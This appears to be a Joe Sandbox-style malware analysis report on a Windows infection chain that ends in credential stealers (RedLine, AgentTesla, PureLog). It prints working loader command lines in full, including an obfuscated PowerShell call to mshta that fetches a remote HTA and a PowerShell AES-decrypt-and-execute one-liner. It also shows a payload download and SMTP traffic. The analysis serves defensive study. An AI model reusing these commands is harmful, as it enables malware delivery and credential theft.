                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                          Host: www.sessosesso.it
                                                                                                                          Connection: Keep-Alive
2024-04-24 04:45:19 UTC | 226 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: aruba-proxy
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:18 GMT
                                                                                                                          Content-Length: 78133
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Tue, 23 Apr 2024 08:57:08 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-ServerName: ipvsproxy74.ad.aruba.it
2024-04-24 04:45:19 UTC | 16158 | IN | Data Raw: 97 ac ca b2 c3 22 c9 fe c3 4a 58 2d be 10 1e c8 d2 60 83 dd 2b 36 84 0a 43 8f cd 78 24 13 76 0e ac d6 f2 7a ac 52 d4 13 d9 80 9c d0 37 5e 83 94 f3 66 61 14 38 13 9f 60 27 c0 6f 33 55 50 da b0 d4 49 80 e7 1d a4 1c 80 8b 6f 04 ab 99 b4 d2 e4 0b 38 85 bd b1 62 d6 99 37 91 52 eb e2 a0 be 88 a5 ec fb ee de 9b 77 4f 4a e0 88 c8 0f f3 c6 73 ed 8a 28 1d cb 1d fe 72 73 e7 b0 8c 51 30 9d ea b1 7b 05 ad b8 e3 05 6f c1 35 72 d1 d9 0d 89 43 ca df fd 57 78 a1 bd 88 ee 89 7b f7 eb ea fd 1a 42 9e 17 94 ee 19 ba 09 85 b9 5b 95 aa 2c 98 65 5e 6d c1 72 32 46 72 10 bd 7c be 2f 68 0e 84 d6 38 58 8e 3a f6 f4 54 b0 24 f4 d2 bf 45 28 de c1 f0 15 99 7e 29 8a e8 fc 2c 06 d6 71 5b 8b a1 76 34 84 5c 52 9e 5e 6f 69 18 10 4d 3e 73 b2 ca 95 9e fc 3e 52 75 05 ad ad 6f 92 0e ef 1d e3 55
                                                                                                                          Data Ascii: "JX-`+6Cx$vzR7^fa8`'o3UPIo8b7RwOJs(rsQ0{o5rCWx{B[,e^mr2Fr|/h8X:T$E(~),q[v4\R^oiM>s>RuoU
2024-04-24 04:45:19 UTC | 16384 | IN | Data Raw: 46 75 2c 77 57 2c 54 79 2c 64 4d 2c 46 63 2c 6c 55 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 46 75 2c 4c 67 2c 54 45 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 46 75 2c 4c 67 2c 64 4d 2c 54 79 2c 64 4d 2c 54 45 2c 55 69 2c 54 79 2c 46 75 2c 4b 42 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 54 45 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 46 75 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 64 4d 2c 55 69 2c 4c 67 2c 54 79 2c 64 4d 2c 77 57 2c 55 69 2c 54 79 2c 46 75 2c 64 4b 2c 4b 42 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 46 75 2c 6c 55 2c 64 4b 2c 54 79 2c 64 4d 2c 77 57 2c 77 57 2c 54 79 2c 64 4d 2c 77 57 2c 64 4d 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 64 4d 2c 46 63 2c
                                                                                                                          Data Ascii: Fu,wW,Ty,dM,Fc,lU,Ty,Fu,KB,Fc,Ty,Fu,Lg,TE,Ty,dM,wW,Fu,Ty,Fu,Lg,dM,Ty,dM,TE,Ui,Ty,Fu,KB,Fu,Ty,dM,TE,TE,Ty,dM,wW,Fu,Ty,dM,TE,Fu,Ty,Fu,KB,Fc,Ty,dM,Ui,Lg,Ty,dM,wW,Ui,Ty,Fu,dK,KB,Ty,Fu,KB,Fc,Ty,Fu,KB,lU,Ty,Fu,lU,dK,Ty,dM,wW,wW,Ty,dM,wW,dM,Ty,Fu,KB,Fc,Ty,dM,Fc,
2024-04-24 04:45:19 UTC | 16384 | IN | Data Raw: 75 2c 54 79 2c 64 4d 2c 54 45 2c 4c 67 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 46 75 2c 4c 67 2c 64 4d 2c 54 79 2c 46 75 2c 6c 55 2c 6c 55 2c 54 79 2c 46 75 2c 4c 67 2c 55 69 2c 54 79 2c 46 75 2c 4c 67 2c 46 75 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 64 4d 2c 64 4d 2c 46 63 2c 54 79 2c 64 4d 2c 77 57 2c 77 57 2c 54 79 2c 46 75 2c 4b 42 2c 55 69 2c 54 79 2c 46 75 2c 4b 42 2c 4c 67 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 46 75 2c 4c 67 2c 55 69 2c 54 79 2c 46 75 2c 6c 55 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 6c 55 2c 54 79 2c 64 4d 2c 46 63 2c 77 57 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 6c 55 2c 54 79 2c 64 4d 2c 46 63 2c 4b 42 2c 54 79 2c 46 75 2c 6c 55 2c 55 69 2c 54 79 2c 46 75 2c 6c 55 2c 46 75 2c 54
                                                                                                                          Data Ascii: u,Ty,dM,TE,Lg,Ty,dM,wW,Fu,Ty,Fu,Lg,dM,Ty,Fu,lU,lU,Ty,Fu,Lg,Ui,Ty,Fu,Lg,Fu,Ty,Fu,KB,lU,Ty,dM,dM,Fc,Ty,dM,wW,wW,Ty,Fu,KB,Ui,Ty,Fu,KB,Lg,Ty,Fu,KB,lU,Ty,Fu,Lg,Ui,Ty,Fu,lU,Fu,Ty,dM,TE,lU,Ty,dM,Fc,wW,Ty,dM,wW,Fu,Ty,dM,TE,lU,Ty,dM,Fc,KB,Ty,Fu,lU,Ui,Ty,Fu,lU,Fu,T
2024-04-24 04:45:19 UTC | 16384 | IN | Data Raw: 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 66 61 69 6c 65 64 21 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 45 00 00 50 61 63 6b 61 67 65 52 65 67 69 73 74 72 61 74 69 6f 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 73 75 63 63 65 65 64 65 64 21 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 2a 00 00 43 61 6c 63 75 6c 61 74 6f 72 57 69 6e 4d 61 69 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 53 74 61 72 74 65 64 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 44 00 00 50 61 63 6b 61 67 65 52 65 67 69 73 74 72 61 74 69 6f 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 66 69 6e 69 73 68 65
                                                                                                                          Data Ascii: n"Calculator package verification failed!"EPackageRegistration"Calculator package verification succeeded!"*CalculatorWinMain"CalculatorStarted"DPackageRegistration"Calculator package registration finishe
2024-04-24 04:45:19 UTC | 12823 | IN | Data Raw: 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 47 46 46 ff 47 47 47 ff 47 46 46 ff ff ff ff ff ff ff ff ff 46 46 46 ff 46 46 46 ff 47 46 46 ff 47 46 47 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff ff ff ff ff ff ff ff ff 47 47 47 ff 47 47 47 ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 47 47 ff 46 46 46 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                          Data Ascii: FFGGGFFFFFFGFFGGGGFFFFFFFFGFFGFGFFFGGGFFFGFFGGGGGGGGGFFFGGGGGGGGGGGGGFFGGGGGGGGGGGGGGGGFGFFFFFFGGGFFFFFFGFFGGGGGGGFGGGGFFFFFFFFFGGGGGGGFGFFFFFFFFFGGGFFF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49710 | 89.46.106.29 | 443 | 7800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:45:25 UTC | 83 | OUT | GET /assets/aw/Book1.xlsx HTTP/1.1
                                                                                                                          Host: sessosesso.it
                                                                                                                          Connection: Keep-Alive
2024-04-24 04:45:26 UTC | 261 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: aruba-proxy
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.sessosesso.it/assets/aw/Book1.xlsx
                                                                                                                          X-ServerName: ipvsproxy74.ad.aruba.it
2024-04-24 04:45:26 UTC | 179 | IN | Data (ASCII): a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49713 | 89.46.106.29 | 443 | 7800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:45:27 UTC | 83 | OUT | GET /assets/aw/uc.exe HTTP/1.1
  Host: www.sessosesso.it
  Connection: Keep-Alive
2024-04-24 04:45:28 UTC | 268 | IN | HTTP/1.1 200 OK
  Server: aruba-proxy
  Date: Wed, 24 Apr 2024 04:45:27 GMT
  Content-Type: application/x-msdownload
  Content-Length: 1646592
  Connection: close
  Last-Modified: Tue, 23 Apr 2024 08:40:32 GMT
  Accept-Ranges: bytes
  X-ServerName: ipvsproxy74.ad.aruba.it
2024-04-24 04:45:28 UTC | 16116 | IN | Data (ASCII): MZP@!L!This program must be run under Win32$7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49716 | 13.107.139.11 | 443 | 8080 | C:\Users\user\AppData\Roaming\uc.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:45:32 UTC | 213 | OUT | GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: onedrive.live.com
2024-04-24 04:45:33 UTC | 1165 | IN | HTTP/1.1 302 Found
  Cache-Control: no-cache, no-store
  Pragma: no-cache
  Content-Type: text/html
  Expires: -1
  Location: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y28186nw-ek1Ds2XbchrhSTbOW4oRk7ufrrG4qLaI4J3DOjPAYH2PRgLqWYP8iX9iQ-cDpcG1nTyrYPpCzRyGTHwQE321S3MeJCqEMQWkMCTAyeOJgGrRANqOF7fqjFj04tiS3-yiZMZVNCBP1OXgsNw/ori?download&psid=1
  Set-Cookie: E=P:4JcYYBlk3Ig=:iozxzn9ily+JGu13FGexKk+nOPUbUiDvxqC7EBwT4lo=:F; domain=.live.com; path=/
  Set-Cookie: xid=7a5528bd-8258-4c2e-8e86-f30686e2b703&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
  Set-Cookie: xidseq=1; domain=.live.com; path=/
  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:05:32 GMT; path=/
  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 04:45:33 GMT; path=/
  X-Content-Type-Options: nosniff
  Strict-Transport-Security: max-age=31536000
  X-MSNServer: 58656754b6-kx22h
  X-ODWebServer: namsouthce155880-odwebpl
  X-Cache: CONFIG_NOCACHE
  X-MSEdge-Ref: Ref A: 4311158B745143B9BBBDC5B91B8D565B Ref B: BY3EDGE0319 Ref C: 2024-04-24T04:45:32Z
  Date: Wed, 24 Apr 2024 04:45:32 GMT
  Connection: close
  Content-Length: 0


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 24, 2024 06:45:43.317347050 CEST | 587 | 49721 | 192.185.124.132 | 192.168.2.7 | 220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:45:43 -0500
  220-We do not authorize the use of this system to transport unsolicited,
  220 and/or bulk e-mail.
Apr 24, 2024 06:45:43.321599007 CEST | 49721 | 587 | 192.168.2.7 | 192.185.124.132 | EHLO 035347
Apr 24, 2024 06:45:43.519418955 CEST | 587 | 49721 | 192.185.124.132 | 192.168.2.7 | 250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
  250-SIZE 52428800
  250-8BITMIME
  250-PIPELINING
  250-PIPECONNECT
  250-AUTH PLAIN LOGIN
  250-STARTTLS
  250 HELP
Apr 24, 2024 06:45:43.519639015 CEST | 49721 | 587 | 192.168.2.7 | 192.185.124.132 | STARTTLS
Apr 24, 2024 06:45:43.718705893 CEST | 587 | 49721 | 192.185.124.132 | 192.168.2.7 | 220 TLS go ahead
Apr 24, 2024 06:45:56.168767929 CEST | 587 | 49722 | 192.185.124.132 | 192.168.2.7 | 220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:45:56 -0500
  220-We do not authorize the use of this system to transport unsolicited,
  220 and/or bulk e-mail.
Apr 24, 2024 06:45:56.169078112 CEST | 49722 | 587 | 192.168.2.7 | 192.185.124.132 | EHLO 035347
Apr 24, 2024 06:45:56.367539883 CEST | 587 | 49722 | 192.185.124.132 | 192.168.2.7 | 250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
  250-SIZE 52428800
  250-8BITMIME
  250-PIPELINING
  250-PIPECONNECT
  250-AUTH PLAIN LOGIN
  250-STARTTLS
  250 HELP
Apr 24, 2024 06:45:56.371162891 CEST | 49722 | 587 | 192.168.2.7 | 192.185.124.132 | STARTTLS
Apr 24, 2024 06:45:56.571888924 CEST | 587 | 49722 | 192.185.124.132 | 192.168.2.7 | 220 TLS go ahead
Apr 24, 2024 06:46:07.610466003 CEST | 587 | 49723 | 192.185.124.132 | 192.168.2.7 | 220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:46:07 -0500
  220-We do not authorize the use of this system to transport unsolicited,
  220 and/or bulk e-mail.
Apr 24, 2024 06:46:07.611737967 CEST | 49723 | 587 | 192.168.2.7 | 192.185.124.132 | EHLO 035347
Apr 24, 2024 06:46:07.809578896 CEST | 587 | 49723 | 192.185.124.132 | 192.168.2.7 | 250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
  250-SIZE 52428800
  250-8BITMIME
  250-PIPELINING
  250-PIPECONNECT
  250-AUTH PLAIN LOGIN
  250-STARTTLS
  250 HELP
Apr 24, 2024 06:46:07.809763908 CEST | 49723 | 587 | 192.168.2.7 | 192.185.124.132 | STARTTLS
Apr 24, 2024 06:46:08.009613037 CEST | 587 | 49723 | 192.185.124.132 | 192.168.2.7 | 220 TLS go ahead

Target ID: 1
Start time: 06:45:13
Start date: 24/04/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 06:45:13
Start date: 24/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 06:45:15
Start date: 24/04/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
                                                                                                                          Imagebase:0x7ff6f38a0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:14
                                                                                                                          Start time:06:45:18
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:15
                                                                                                                          Start time:06:45:19
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:16
                                                                                                                          Start time:06:45:19
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:17
                                                                                                                          Start time:06:45:20
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:19
                                                                                                                          Start time:06:45:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\uc.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 58%, ReversingLabs
                                                                                                                          • Detection: 38%, Virustotal
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:20
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                                                                                                                          Imagebase:0x410000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:21
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:22
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                                                                                                                          Imagebase:0x860000
                                                                                                                          File size:29'184 bytes
                                                                                                                          MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:23
                                                                                                                          Start time:08:24:31
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                          • Detection: 0%, Virustotal
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:24
                                                                                                                          Start time:08:24:43
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\Ucvuiswb.PIF
